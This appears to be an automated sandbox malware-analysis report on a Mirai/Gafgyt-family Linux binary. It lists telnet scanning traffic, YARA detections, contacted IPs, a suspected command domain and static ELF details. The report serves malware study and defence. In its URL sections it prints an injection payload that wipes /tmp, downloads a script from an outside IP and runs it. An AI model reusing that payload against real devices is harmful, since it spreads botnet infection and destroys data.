Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45756
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45760
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45768
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45770
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45782
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45800
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45814
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45822
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45830
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45844
Source: unknown	Network traffic detected: HTTP traffic on port 50834 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 42256 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45870
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45884
Source: unknown	Network traffic detected: HTTP traffic on port 34666 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 37215 -> 34666
Source: unknown	Network traffic detected: HTTP traffic on port 33156 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 46408 -> 37215

Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5251)	Queries kernel information via 'uname':
Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5252)	Queries kernel information via 'uname':
Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5253)	Queries kernel information via 'uname':
Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5254)	Queries kernel information via 'uname':
Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5255)	Queries kernel information via 'uname':
Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5256)	Queries kernel information via 'uname':

Stealing of Sensitive Information:

Yara detected Mirai

Show sources

Source: Yara match	File source: 5243.1.000000001a887bdc.00000000531557b5.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5241.1.000000001a887bdc.00000000531557b5.r-x.sdmp, type: MEMORY
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Gafgyt

Show sources

Source: Yara match	File source: 5243.1.000000001a887bdc.00000000531557b5.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5241.1.000000001a887bdc.00000000531557b5.r-x.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected Mirai

Show sources

Source: Yara match	File source: 5243.1.000000001a887bdc.00000000531557b5.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5241.1.000000001a887bdc.00000000531557b5.r-x.sdmp, type: MEMORY
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Gafgyt

Show sources

Source: Yara match	File source: 5243.1.000000001a887bdc.00000000531557b5.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5241.1.000000001a887bdc.00000000531557b5.r-x.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Path Interception	Path Interception	Hidden Files and Directories1	OS Credential Dumping1	Security Software Discovery1	Remote Services	Data from Local System	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Obfuscated Files or Information1	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Non-Standard Port11	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol4	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol15	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	Remote System Discovery	SSH	Keylogging	Data Transfer Size Limits	Ingress Tool Transfer3	Manipulate Device Communication		Manipulate App Store Rankings or Ratings

Malware Configuration

No configs have been found

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
9o6Z1wEokT	33%	Virustotal		Browse
9o6Z1wEokT	36%	ReversingLabs	Linux.Trojan.Mirai

Dropped Files

No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
scamanje.stresserit.pro	4%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://49.12.233.52/bin	0%	Avira URL Cloud	safe
http://127.0.0.1:80/shell?cd+/tmp;rm+-rf+*;wget+49.12.233.52/jaws;sh+/tmp/jaws	0%	Virustotal		Browse
http://127.0.0.1:80/shell?cd+/tmp;rm+-rf+*;wget+49.12.233.52/jaws;sh+/tmp/jaws	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
scamanje.stresserit.pro	49.12.233.52	true	false	4%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://127.0.0.1:80/shell?cd+/tmp;rm+-rf+*;wget+49.12.233.52/jaws;sh+/tmp/jaws	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://upx.sf.net	9o6Z1wEokT	false		high
http://49.12.233.52/bin	9o6Z1wEokT, 5241.1.000000001a887bdc.00000000531557b5.r-x.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/soap/encoding/	9o6Z1wEokT, 5241.1.000000001a887bdc.00000000531557b5.r-x.sdmp	false		high
http://schemas.xmlsoap.org/soap/envelope/	9o6Z1wEokT, 5241.1.000000001a887bdc.00000000531557b5.r-x.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
12.207.216.252	unknown	United States	7018	ATT-INTERNET4US	false
178.18.96.250	unknown	Russian Federation	8427	MAGINFO-ASMagnitogorskRussiaRU	false
51.37.119.129	unknown	Ireland	15502	VODAFONE-IRELAND-ASNIE	false
202.161.141.133	unknown	Hong Kong	11919	LORAL-SKYNET-ARUS	false
222.226.32.46	unknown	Japan	2516	KDDIKDDICORPORATIONJP	false
74.52.27.51	unknown	United States	36351	SOFTLAYERUS	false
41.145.154.94	unknown	South Africa	5713	SAIX-NETZA	false
223.148.2.244	unknown	China	4134	CHINANET-BACKBONENo31Jin-rongStreetCN	false
116.90.107.205	unknown	Pakistan	45814	FARIYA-PKFariyaNetworksPvtLtdPK	false
139.22.3.99	unknown	Germany	680	DFNVereinzurFoerderungeinesDeutschenForschungsnetzese	false
131.163.248.60	unknown	Canada	6591	INGR-ASNUS	false
117.115.137.146	unknown	China	4847	CNIX-APChinaNetworksInter-ExchangeCN	false
204.79.203.53	unknown	United States	19576	EASTERN-AS-01US	false
164.41.71.61	unknown	Brazil	21506	FundacaoUniversidadedeBrasiliaBR	false
205.176.15.147	unknown	United States	8103	STATE-OF-FLAUS	false
183.206.97.10	unknown	China	56046	CMNET-JIANGSU-APChinaMobilecommunicationscorporationCN	false
210.60.42.108	unknown	Taiwan; Republic of China (ROC)	1659	ERX-TANET-ASN1TaiwanAcademicNetworkTANetInformationC	false
197.136.224.39	unknown	Kenya	36914	KENET-ASKE	false
71.167.226.28	unknown	United States	701	UUNETUS	false
41.51.170.27	unknown	South Africa	37168	CELL-CZA	false
78.209.96.98	unknown	France	12322	PROXADFR	false
115.178.4.124	unknown	Hong Kong	24506	YAHOO-TP2YAHOOTAIWANTW	false
148.29.157.23	unknown	United States	6400	CompaniaDominicanadeTelefonosSADO	false
141.93.110.68	unknown	Netherlands	680	DFNVereinzurFoerderungeinesDeutschenForschungsnetzese	false
104.119.90.59	unknown	United States	2828	XO-AS15US	false
82.60.20.181	unknown	Italy	3269	ASN-IBSNAZIT	false
41.190.129.207	unknown	Mauritius	36997	INFOCOM-UG	false
156.38.69.244	unknown	Togo	36924	GVA-CanalboxBJ	false
197.90.74.62	unknown	South Africa	10474	OPTINETZA	false
210.33.92.35	unknown	China	4538	ERX-CERNET-BKBChinaEducationandResearchNetworkCenter	false
156.49.195.231	unknown	Sweden	29975	VODACOM-ZA	false
156.57.94.245	unknown	Canada	855	CANET-ASN-4CA	false
175.184.26.171	unknown	Japan	2510	INFOWEBFUJITSULIMITEDJP	false
197.12.117.158	unknown	Tunisia	37703	ATLAXTN	false
213.246.160.119	unknown	United Kingdom	8586	OBSL-ASTalkTalk-BusinessdivisionGB	false
156.235.189.126	unknown	Seychelles	134548	DXTL-HKDXTLTseungKwanOServiceHK	false
197.237.248.144	unknown	Kenya	15399	WANANCHI-KE	false
210.25.254.104	unknown	China	4538	ERX-CERNET-BKBChinaEducationandResearchNetworkCenter	false
218.85.108.163	unknown	China	4134	CHINANET-BACKBONENo31Jin-rongStreetCN	false
98.163.92.7	unknown	United States	22773	ASN-CXA-ALL-CCI-22773-RDCUS	false
144.79.42.106	unknown	unknown	24940	HETZNER-ASDE	false
18.138.65.36	unknown	United States	16509	AMAZON-02US	false
52.172.168.232	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
161.31.175.172	unknown	United States	40581	AREON-ASUS	false
2.6.97.90	unknown	France	3215	FranceTelecom-OrangeFR	false
197.190.12.213	unknown	Ghana	37140	zain-asGH	false
74.250.40.167	unknown	United States	6389	BELLSOUTH-NET-BLKUS	false
94.7.176.226	unknown	United Kingdom	5607	BSKYB-BROADBAND-ASGB	false
60.94.29.130	unknown	Japan	17676	GIGAINFRASoftbankBBCorpJP	false
180.246.6.3	unknown	Indonesia	7713	TELKOMNET-AS-APPTTelekomunikasiIndonesiaID	false
155.138.246.9	unknown	United States	20473	AS-CHOOPAUS	true
118.144.105.159	unknown	China	4808	CHINA169-BJChinaUnicomBeijingProvinceNetworkCN	false
208.196.44.13	unknown	United States	701	UUNETUS	false
199.91.86.20	unknown	Canada	15247	RADIANT-VANCOUVERCA	false
109.183.48.98	unknown	Czech Republic	12767	PRAGONET-ASCZ	false
123.114.215.96	unknown	China	4808	CHINA169-BJChinaUnicomBeijingProvinceNetworkCN	false
41.127.73.195	unknown	South Africa	16637	MTNNS-ASZA	false
40.28.77.69	unknown	United States	4249	LILLY-ASUS	false
178.60.215.125	unknown	Spain	12334	Galicia-SpainES	false
42.253.2.46	unknown	China	4134	CHINANET-BACKBONENo31Jin-rongStreetCN	false
156.11.35.24	unknown	Canada	15290	ALLST-15290CA	false
41.35.35.154	unknown	Egypt	8452	TE-ASTE-ASEG	false
41.76.191.251	unknown	Kenya	37225	NETWIDEZA	false
197.47.108.232	unknown	Egypt	8452	TE-ASTE-ASEG	false
202.97.163.205	unknown	China	4837	CHINA169-BACKBONECHINAUNICOMChina169BackboneCN	false
41.102.150.114	unknown	Algeria	36947	ALGTEL-ASDZ	false
120.186.107.194	unknown	Indonesia	4761	INDOSAT-INP-APINDOSATInternetNetworkProviderID	false
69.186.67.178	unknown	United States	3801	MISNETUS	false
156.121.7.93	unknown	United States	393504	XNSTGCA	false
115.126.52.106	unknown	Hong Kong	38186	FTG-AS-APForewinTelecomGroupLimitedISPatHK	false
174.67.133.238	unknown	United States	22773	ASN-CXA-ALL-CCI-22773-RDCUS	false
41.61.164.252	unknown	South Africa	36943	GridhostZA	false
37.98.140.246	unknown	Finland	57732	IPPOY-ASFI	false
152.113.180.106	unknown	United States	4193	WA-STATE-GOVUS	false
42.204.186.204	unknown	China	7641	CHINABTNChinaBroadcastingTVNetCN	false
42.4.251.174	unknown	China	4837	CHINA169-BACKBONECHINAUNICOMChina169BackboneCN	false
109.7.133.227	unknown	France	15557	LDCOMNETFR	false
123.145.54.222	unknown	China	4837	CHINA169-BACKBONECHINAUNICOMChina169BackboneCN	false
112.180.205.190	unknown	Korea Republic of	4766	KIXS-AS-KRKoreaTelecomKR	false
47.105.148.45	unknown	China	37963	CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd	false
38.162.241.85	unknown	United States	174	COGENT-174US	false
96.104.187.63	unknown	United States	7922	COMCAST-7922US	false
5.142.43.27	unknown	Russian Federation	12389	ROSTELECOM-ASRU	false
156.240.70.1	unknown	Seychelles	328608	Africa-on-Cloud-ASZA	false
158.163.60.230	unknown	Canada	1930	RCCNFundacaoparaaCienciaeaTecnologiaIPPT	false
206.112.107.64	unknown	United States	11486	COLO-PREM-VZBUS	false
168.2.58.209	unknown	United States	8	RICE-ASUS	false
182.235.102.243	unknown	Taiwan; Republic of China (ROC)	9416	MULTIMEDIA-AS-APHoshinMultimediaCenterIncTW	false
197.50.174.117	unknown	Egypt	8452	TE-ASTE-ASEG	false
160.12.51.133	unknown	Japan	2907	SINET-ASResearchOrganizationofInformationandSystemsN	false
150.94.128.87	unknown	Japan	6400	CompaniaDominicanadeTelefonosSADO	false
79.101.206.56	unknown	Serbia	8400	TELEKOM-ASRS	false
210.232.162.151	unknown	Japan	4713	OCNNTTCommunicationsCorporationJP	false
37.129.242.246	unknown	Iran (ISLAMIC Republic Of)	197207	MCCI-ASIR	false
52.35.26.205	unknown	United States	16509	AMAZON-02US	false
57.171.197.28	unknown	Belgium	2686	ATGS-MMD-ASUS	false
84.184.1.125	unknown	Germany	3320	DTAGInternetserviceprovideroperationsDE	false
148.94.50.51	unknown	United States	786	JANETJiscServicesLimitedGB	false
31.241.9.128	unknown	Germany	3320	DTAGInternetserviceprovideroperationsDE	false
5.107.178.204	unknown	United Arab Emirates	5384	EMIRATES-INTERNETEmiratesInternetAE	false

Runtime Messages

Command:	/tmp/9o6Z1wEokT
Exit Code:	0
Exit Code Info:
Killed:	False
Standard Output:	unstable_is_the_history_of_universe
Standard Error:

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
104.119.90.59	4XDPFw0YiS	Get hash	malicious	Browse
51.37.119.129	jew.x86	Get hash	malicious	Browse
156.38.69.244	x86	Get hash	malicious	Browse
156.57.94.245	8UoSNa8TSm	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
scamanje.stresserit.pro	mP1pg0ryFA	Get hash	malicious	Browse	49.12.233.52
scamanje.stresserit.pro	yxD7DmfG2j	Get hash	malicious	Browse	49.12.233.52

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
VODAFONE-IRELAND-ASNIE	INsMwWSMeh	Get hash	malicious	Browse	109.79.237.146
	wRmHCEnowI	Get hash	malicious	Browse	109.76.156.165
	4VC4C0PxQb	Get hash	malicious	Browse	109.76.108.233
	Xb1sM3W7BK	Get hash	malicious	Browse	109.76.232.26
	B6WwgS8sUq	Get hash	malicious	Browse	109.76.18.4
	bTRSDGefHc	Get hash	malicious	Browse	109.76.220.42
	HeCoAUTGxq	Get hash	malicious	Browse	64.43.155.111
	N1Cyp2N7r0	Get hash	malicious	Browse	93.107.150.13
	U6lZQUtrU5	Get hash	malicious	Browse	93.107.144.148
	qApSRSFTm4	Get hash	malicious	Browse	109.76.3.251
	Iu8Qn68jzj	Get hash	malicious	Browse	93.107.149.34
	TZaEkR9qXI	Get hash	malicious	Browse	109.78.200.229
	jew.x86	Get hash	malicious	Browse	51.37.119.129
	v17c18jKB5	Get hash	malicious	Browse	109.79.4.8
	Darknet.arm7	Get hash	malicious	Browse	109.76.156.152
	vz3I1CuJPQ	Get hash	malicious	Browse	51.37.119.108
	ytOS5MFAnd	Get hash	malicious	Browse	109.76.156.151
	M2hPt9E5Fk	Get hash	malicious	Browse	109.79.237.187
	4Vp1NlOQKm	Get hash	malicious	Browse	64.43.0.76
	BunfEuaoK5	Get hash	malicious	Browse	109.76.220.29
ATT-INTERNET4US	00hZyjOhZA	Get hash	malicious	Browse	70.250.254.60
	yxD7DmfG2j	Get hash	malicious	Browse	106.0.113.38
	V2WzER53Tt	Get hash	malicious	Browse	74.166.99.108
	a5nulABeSk	Get hash	malicious	Browse	108.64.172.130
	1bL17EUgTk	Get hash	malicious	Browse	107.193.164.34
	pTF1iICUEm	Get hash	malicious	Browse	13.186.169.31
	032k4JmR0U	Get hash	malicious	Browse	70.142.13.244
	arm	Get hash	malicious	Browse	107.220.87.241
	x86	Get hash	malicious	Browse	108.213.51.215
	arm7	Get hash	malicious	Browse	104.58.236.145
	z0x3n.arm7	Get hash	malicious	Browse	45.21.146.181
	z0x3n.x86	Get hash	malicious	Browse	70.131.55.48
	z0x3n.arm	Get hash	malicious	Browse	45.21.146.120
	arm	Get hash	malicious	Browse	32.113.207.119
	yJOZ3EeESV	Get hash	malicious	Browse	107.192.232.195
	lYmYPlzghQ	Get hash	malicious	Browse	107.79.252.238
	T0uznhDXKw	Get hash	malicious	Browse	45.20.156.245
	ev1JsPbdMA	Get hash	malicious	Browse	107.116.72.61
	apep.arm	Get hash	malicious	Browse	107.131.217.182
	apep.x86	Get hash	malicious	Browse	45.21.146.187
MAGINFO-ASMagnitogorskRussiaRU	eNrYzJWFvB	Get hash	malicious	Browse	178.18.96.212
	waKnA3vFb3	Get hash	malicious	Browse	212.21.23.160
	xYFPBfWEN0	Get hash	malicious	Browse	212.21.23.150
	7spunOMzSK	Get hash	malicious	Browse	31.47.122.175
	Shipment_Info_163612.doc	Get hash	malicious	Browse	188.68.208.240
	Hien Thome #U00a0 Resume.doc	Get hash	malicious	Browse	188.68.210.20
	IDS00038182991.doc	Get hash	malicious	Browse	188.68.208.242
	U0430.xls.js	Get hash	malicious	Browse	46.167.69.86

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General
File type:	ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, stripped
Entropy (8bit):	7.957339112349477
TrID:	ELF Executable and Linkable format (Linux) (4029/14) 50.16% ELF Executable and Linkable format (generic) (4004/1) 49.84%
File name:	9o6Z1wEokT
File size:	36468
MD5:	68cb43368a1a8837125de604f0c2a11e
SHA1:	aebd07f775086490ee2b054a59fa7f9494c8de84
SHA256:	126ddb96a062731ec243a9313504aaba974cbe7b677d39a23fd6750f88fc772e
SHA512:	fd7ba93550c77c52f95ffcb2177eba3434cba5729d9b63a5c5d852846227ecbaeb8202b2d91b56b23bbb8b3aae1aaf9f0bcb46964690c490edca3364f1e85f96
SSDEEP:	768:1AqA+P55pFT5yIrvg6htPfgO2puhjSOnskhCuTynbcuyD7Ufyqt:1Al+P5tT5hvzLv2puhO2Zhlynouy8qqt
File Content Preview:	.ELF........................4...........4. ...(.....................n...n...........................................Q.td............................pc..UPX!........pS..pS......U..........?..k.I/.j....\.h.blz.e..*.....4.0.N..9..y.#2."A..w.....Bv.:.j...a_.x

Static ELF Info

ELF header
Class:	ELF32
Data:	2's complement, little endian
Version:	1 (current)
Machine:	Intel 80386
Version Number:	0x1
Type:	EXEC (Executable file)
OS/ABI:	UNIX - Linux
ABI Version:	0
Entry Point Address:	0x804fae8
Flags:	0x0
ELF Header Size:	52
Program Header Offset:	52
Program Header Size:	32
Number of Program Headers:	3
Section Header Offset:	0
Section Header Size:	40
Number of Section Headers:	0
Header String Table Index:	0

Program Segments

Type	Offset	Virtual Address	Physical Address	File Size	Memory Size	Entropy	Flags	Flags Description	Align
LOAD	0x0	0x8048000	0x8048000	0x8d6e	0x8d6e	4.1139	0x5	R E	0x1000
LOAD	0x0	0x8051000	0x8051000	0x0	0xc9e0	0.0000	0x6	RW	0x1000
GNU_STACK	0x0	0x0	0x0	0x0	0x0	0.0000	0x6	RW	0x4

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 1, 2021 10:08:27.432713032 CET	61687	23	192.168.2.23	119.56.28.63
Nov 1, 2021 10:08:27.432718992 CET	61687	23	192.168.2.23	164.163.128.63
Nov 1, 2021 10:08:27.432734966 CET	61687	23	192.168.2.23	48.38.69.47
Nov 1, 2021 10:08:27.432739973 CET	61687	23	192.168.2.23	143.132.170.4
Nov 1, 2021 10:08:27.432758093 CET	61687	23	192.168.2.23	18.200.65.140
Nov 1, 2021 10:08:27.432765007 CET	61687	23	192.168.2.23	174.36.86.149
Nov 1, 2021 10:08:27.432765007 CET	61687	23	192.168.2.23	46.22.25.60
Nov 1, 2021 10:08:27.432785988 CET	61687	23	192.168.2.23	120.254.4.252
Nov 1, 2021 10:08:27.432787895 CET	61687	23	192.168.2.23	136.125.53.152
Nov 1, 2021 10:08:27.432787895 CET	61687	23	192.168.2.23	88.92.139.157
Nov 1, 2021 10:08:27.432795048 CET	61687	23	192.168.2.23	17.126.211.13
Nov 1, 2021 10:08:27.432796955 CET	61687	23	192.168.2.23	97.51.17.237
Nov 1, 2021 10:08:27.432802916 CET	61687	23	192.168.2.23	124.55.13.245
Nov 1, 2021 10:08:27.432827950 CET	61687	23	192.168.2.23	66.57.111.242
Nov 1, 2021 10:08:27.432832003 CET	61687	23	192.168.2.23	170.137.120.145
Nov 1, 2021 10:08:27.432843924 CET	61687	23	192.168.2.23	129.178.172.113
Nov 1, 2021 10:08:27.432843924 CET	61687	23	192.168.2.23	189.51.76.83
Nov 1, 2021 10:08:27.432873964 CET	61687	23	192.168.2.23	146.21.183.227
Nov 1, 2021 10:08:27.432874918 CET	61687	23	192.168.2.23	220.123.121.129
Nov 1, 2021 10:08:27.432877064 CET	61687	23	192.168.2.23	189.58.217.237
Nov 1, 2021 10:08:27.432881117 CET	61687	23	192.168.2.23	103.250.214.19
Nov 1, 2021 10:08:27.432881117 CET	61687	23	192.168.2.23	160.131.164.73
Nov 1, 2021 10:08:27.432882071 CET	61687	23	192.168.2.23	90.162.2.0
Nov 1, 2021 10:08:27.432890892 CET	61687	23	192.168.2.23	18.125.221.149
Nov 1, 2021 10:08:27.432904959 CET	61687	23	192.168.2.23	42.170.246.198
Nov 1, 2021 10:08:27.432918072 CET	61687	23	192.168.2.23	189.156.239.99
Nov 1, 2021 10:08:27.432928085 CET	61687	23	192.168.2.23	19.215.22.39
Nov 1, 2021 10:08:27.432929039 CET	61687	23	192.168.2.23	40.209.239.25
Nov 1, 2021 10:08:27.432930946 CET	61687	23	192.168.2.23	109.184.221.7
Nov 1, 2021 10:08:27.432931900 CET	61687	23	192.168.2.23	34.201.98.214
Nov 1, 2021 10:08:27.432955980 CET	61687	23	192.168.2.23	27.216.202.208
Nov 1, 2021 10:08:27.432957888 CET	61687	23	192.168.2.23	35.238.214.190
Nov 1, 2021 10:08:27.432959080 CET	61687	23	192.168.2.23	211.199.110.120
Nov 1, 2021 10:08:27.432960033 CET	61687	23	192.168.2.23	80.110.160.3
Nov 1, 2021 10:08:27.432961941 CET	61687	23	192.168.2.23	136.9.83.156
Nov 1, 2021 10:08:27.432976007 CET	61687	23	192.168.2.23	74.104.209.158
Nov 1, 2021 10:08:27.432976007 CET	61687	23	192.168.2.23	144.218.109.233
Nov 1, 2021 10:08:27.432986021 CET	61687	23	192.168.2.23	65.30.16.229
Nov 1, 2021 10:08:27.432986975 CET	61687	23	192.168.2.23	46.130.222.64
Nov 1, 2021 10:08:27.432987928 CET	61687	23	192.168.2.23	24.228.230.209
Nov 1, 2021 10:08:27.432995081 CET	61687	23	192.168.2.23	189.178.155.10
Nov 1, 2021 10:08:27.432998896 CET	61687	23	192.168.2.23	115.56.233.238
Nov 1, 2021 10:08:27.433001995 CET	61687	23	192.168.2.23	188.90.244.109
Nov 1, 2021 10:08:27.433003902 CET	61687	23	192.168.2.23	34.241.47.49
Nov 1, 2021 10:08:27.433010101 CET	61687	23	192.168.2.23	76.135.222.6
Nov 1, 2021 10:08:27.433027029 CET	61687	23	192.168.2.23	181.186.150.189
Nov 1, 2021 10:08:27.433033943 CET	61687	23	192.168.2.23	142.5.66.155
Nov 1, 2021 10:08:27.433033943 CET	61687	23	192.168.2.23	133.167.106.171
Nov 1, 2021 10:08:27.433034897 CET	61687	23	192.168.2.23	31.195.48.73
Nov 1, 2021 10:08:27.433038950 CET	61687	23	192.168.2.23	209.67.64.250
Nov 1, 2021 10:08:27.433042049 CET	61687	23	192.168.2.23	161.58.75.134
Nov 1, 2021 10:08:27.433042049 CET	61687	23	192.168.2.23	197.163.171.22
Nov 1, 2021 10:08:27.433060884 CET	61687	23	192.168.2.23	200.70.74.192
Nov 1, 2021 10:08:27.433068037 CET	61687	23	192.168.2.23	46.15.204.29
Nov 1, 2021 10:08:27.433072090 CET	61687	23	192.168.2.23	107.172.8.8
Nov 1, 2021 10:08:27.433079958 CET	61687	23	192.168.2.23	188.181.122.28
Nov 1, 2021 10:08:27.433089018 CET	61687	23	192.168.2.23	210.180.162.201
Nov 1, 2021 10:08:27.433089972 CET	61687	23	192.168.2.23	114.154.232.178
Nov 1, 2021 10:08:27.433094978 CET	61687	23	192.168.2.23	149.212.171.83
Nov 1, 2021 10:08:27.433095932 CET	61687	23	192.168.2.23	117.6.120.76
Nov 1, 2021 10:08:27.433101892 CET	61687	23	192.168.2.23	188.127.33.71
Nov 1, 2021 10:08:27.433106899 CET	61687	23	192.168.2.23	157.108.194.113
Nov 1, 2021 10:08:27.433110952 CET	61687	23	192.168.2.23	111.19.144.108
Nov 1, 2021 10:08:27.433121920 CET	61687	23	192.168.2.23	125.190.234.162
Nov 1, 2021 10:08:27.433131933 CET	61687	23	192.168.2.23	54.232.202.133
Nov 1, 2021 10:08:27.433135986 CET	61687	23	192.168.2.23	165.44.125.0
Nov 1, 2021 10:08:27.433141947 CET	61687	23	192.168.2.23	54.205.80.17
Nov 1, 2021 10:08:27.433145046 CET	61687	23	192.168.2.23	64.8.15.82
Nov 1, 2021 10:08:27.433147907 CET	61687	23	192.168.2.23	149.92.147.116
Nov 1, 2021 10:08:27.433154106 CET	61687	23	192.168.2.23	103.21.7.82
Nov 1, 2021 10:08:27.433162928 CET	61687	23	192.168.2.23	159.94.112.141
Nov 1, 2021 10:08:27.433171988 CET	61687	23	192.168.2.23	109.41.83.56
Nov 1, 2021 10:08:27.433182955 CET	61687	23	192.168.2.23	8.69.152.175
Nov 1, 2021 10:08:27.433183908 CET	61687	23	192.168.2.23	40.193.169.40
Nov 1, 2021 10:08:27.433192968 CET	61687	23	192.168.2.23	95.191.216.112
Nov 1, 2021 10:08:27.433196068 CET	61687	23	192.168.2.23	97.5.119.237
Nov 1, 2021 10:08:27.433203936 CET	61687	23	192.168.2.23	78.138.131.2
Nov 1, 2021 10:08:27.433207989 CET	61687	23	192.168.2.23	85.22.245.88
Nov 1, 2021 10:08:27.433211088 CET	61687	23	192.168.2.23	64.155.97.224
Nov 1, 2021 10:08:27.433212042 CET	61687	23	192.168.2.23	1.171.206.96
Nov 1, 2021 10:08:27.433232069 CET	61687	23	192.168.2.23	58.98.164.113
Nov 1, 2021 10:08:27.433243036 CET	61687	23	192.168.2.23	144.142.224.63
Nov 1, 2021 10:08:27.433243990 CET	61687	23	192.168.2.23	61.210.53.23
Nov 1, 2021 10:08:27.433245897 CET	61687	23	192.168.2.23	124.12.102.27
Nov 1, 2021 10:08:27.433259010 CET	61687	23	192.168.2.23	51.168.127.63
Nov 1, 2021 10:08:27.433259964 CET	61687	23	192.168.2.23	24.228.169.146
Nov 1, 2021 10:08:27.433260918 CET	61687	23	192.168.2.23	95.12.235.66
Nov 1, 2021 10:08:27.433262110 CET	61687	23	192.168.2.23	175.148.5.23
Nov 1, 2021 10:08:27.433271885 CET	61687	23	192.168.2.23	84.64.144.239
Nov 1, 2021 10:08:27.433273077 CET	61687	23	192.168.2.23	17.4.186.82
Nov 1, 2021 10:08:27.433273077 CET	61687	23	192.168.2.23	119.173.69.225
Nov 1, 2021 10:08:27.433274031 CET	61687	23	192.168.2.23	111.20.252.112
Nov 1, 2021 10:08:27.433274984 CET	61687	23	192.168.2.23	223.193.83.180
Nov 1, 2021 10:08:27.433285952 CET	61687	23	192.168.2.23	18.214.107.152
Nov 1, 2021 10:08:27.433293104 CET	61687	23	192.168.2.23	51.58.191.1
Nov 1, 2021 10:08:27.433295012 CET	61687	23	192.168.2.23	196.114.210.193
Nov 1, 2021 10:08:27.433300972 CET	61687	23	192.168.2.23	131.162.230.218
Nov 1, 2021 10:08:27.433301926 CET	61687	23	192.168.2.23	190.235.253.116
Nov 1, 2021 10:08:27.433304071 CET	61687	23	192.168.2.23	4.33.145.20
Nov 1, 2021 10:08:27.433317900 CET	61687	23	192.168.2.23	220.248.57.46

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Nov 1, 2021 10:08:27.445230961 CET	192.168.2.23	8.8.8.8	0x1680	Standard query (0)	scamanje.stresserit.pro	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
